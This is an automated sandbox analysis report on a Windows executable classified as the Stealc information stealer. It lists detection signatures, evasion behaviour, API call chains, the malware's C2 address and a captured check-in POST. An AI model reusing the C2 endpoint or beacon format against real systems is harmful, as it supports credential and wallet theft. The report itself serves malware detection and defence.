
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561592
MD5: 925d775a24989da8e83cabcd00fde1d3
SHA1: 73373f88fa6798ac4a4bc1566b62814deeb362de
SHA256: 362ede5e1060f28217d49706ced46a1bea1e175bf91c4a1457f921904b9bb32a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 925D775A24989DA8E83CABCD00FDE1D3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1425810310.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1375500190.0000000004C00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7644 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7644 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched.

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T21:08:10.385909+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49717 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php7S | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpbZ | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpJZ | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/~ | Avira URL Cloud: Label: malware
Source: file.exe.7644.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00344C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00344C50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003640B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003460D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00356960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00356960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0034EA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00349B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00349B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00356B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00356B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00349B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00349B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00347750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00347750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003518A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00353910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00353910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035E210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00351269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00351250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00354B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00354B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003523A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00352390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00352390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0035DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0035D530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003416B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003416A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49717 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------JEHDHIEGIIIDHIDHDHJJ
Content-Disposition: form-data; name="hwid"

C32EB04998D23109973498
------JEHDHIEGIIIDHIDHDHJJ
Content-Disposition: form-data; name="build"

mars
------JEHDHIEGIIIDHIDHDHJJ--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00344C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00344C50
Source: file.exe, 00000000.00000002.1425810310.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/9
Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/J
Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1425810310.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%
Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php7S
Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJZ
Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpbZ
Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/~
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00349770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00349770

              System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070000E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003648B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070515D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068D120
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00701AA1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00706A9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059AB7A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FE345
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079834E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E2B1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FAC44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CFC2F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00708516
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070AD83
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00703607
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0064C697
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00344A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: chbioofn ZLIB complexity 0.9947662911084044
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00363A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00363A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0035CAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\QWKWT2D1.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
